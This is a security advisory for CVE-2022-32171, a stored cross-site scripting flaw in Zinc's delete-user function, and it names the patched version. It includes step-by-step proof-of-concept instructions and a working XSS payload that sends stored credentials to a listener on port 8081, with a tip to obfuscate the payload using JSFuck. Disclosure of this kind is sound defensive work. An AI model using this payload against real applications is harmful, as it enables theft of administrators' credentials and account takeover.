CVE-2022-32171

Overview

In Zinc, versions v0.1.9 through v0.3.1 are vulnerable to Stored Cross-Site Scripting when using the delete user functionality. When an authenticated user deletes a user having a XSS payload in the user id field, the javascript payload will be executed and allow an attacker to access the user’s credentials.

Details

Zinc is vulnerable to Stored Cross-Site Scripting in the delete template functionality. When an authenticated user deletes a user having a XSS payload in the user id field, the Javascript payload will be executed. When the payload contains a request to the attacker’s domain, the credentials of the user who deleted the template will be sent encoded in base64 to the attacker, and then the attacker will get access to the site on behalf of the user.

PoC Details

1. Log in to the application as a user and create a new user.
2. Enter the XSS payload in the PoC section below in the user id field. The `localStorage.getItem("creds")` part of the payload needs to be encoded with ‘JSFuck’.
3. Start a listener on 8081 to receive the victim's credentials.
4. Now login as an admin user and navigate to the User tab.
5. Under the Actions tab, click the delete button.
6. The javascript payload will be executed, and the admin’s credentials encoded in base64 will be sent to the attacker.

PoC Code

"><img src=x onerror=this.src='http:&#x2f;&#x2f;127.0.0.1:8081&#x2f;?x='+localStorage.getItem("creds")>

Affected Environments

Zinc versions v0.1.9 through v0.3.1

Prevention

Upgrade to zinc version v0.3.2